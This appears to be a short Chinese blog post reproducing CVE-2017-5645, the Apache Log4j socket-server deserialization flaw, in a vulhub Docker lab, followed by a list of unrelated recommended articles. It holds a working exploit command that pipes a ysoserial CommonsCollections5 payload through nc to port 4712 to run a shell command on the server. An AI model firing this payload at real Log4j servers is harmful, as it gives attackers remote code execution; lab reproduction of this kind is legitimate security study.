vulhub中Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)

余生有个小酒馆2024-02-20 12:59

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

1.我们使用ysoserial生成payload,然后直接发送给`your-ip:4712`端口即可。

复制代码 
java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712

工具地址 https://github.com/frohoff/ysoserial

需要注意JDK版本的问题 https://github.com/frohoff/ysoserial/issues/203

2.然后执行`docker compose exec log4j bash`进入容器,可见 /tmp/success 已成功创建:

相关推荐
JosieBook11 分钟前
【数据库】Apache IoTDB数据库在大数据场景下的时序数据模型与建模方案
数据库·apache·iotdb
LSL666_6 小时前
Spring 框架整合 JUnit 单元测试——包含完整执行流程
spring·junit·log4j
郝开12 小时前
Spring Boot 2.7.18(最终 2.x 系列版本)8 - 日志:Log4j2 基本概念;Log4j2 多环境日志配置策略
spring boot·单元测试·log4j
SeaTunnel17 小时前
结项报告完整版 | Apache SeaTunnel支持metalake开发
apache
迦蓝叶1 天前
Apache Jena 知识图谱持久化:选择适合你的存储方案
人工智能·开源·apache·知识图谱·持久化·存储·jena
深色風信子1 天前
Java Maven Log4j 项目日志打印
java·log4j·maven·java maven
q***98521 天前
【保姆级教程】apache-tomcat的安装配置教程
java·tomcat·apache
DolphinScheduler社区1 天前
Apache DolphinScheduler 新增 gRPC 任务插件 | 开源之夏成果总结
大数据·开源·apache·海豚调度
Monody_R1 天前
rhce作业
linux·服务器·apache
CodeBlossom1 天前
Apache POI
apache
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)04综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件05Linux下V2Ray安装配置指南06BongoCat - 跨平台键盘猫动画工具07Labelme从安装到标注:零基础完整指南08智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践09《大数据技术原理与应用》实验报告三 熟悉HBase常用操作10NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南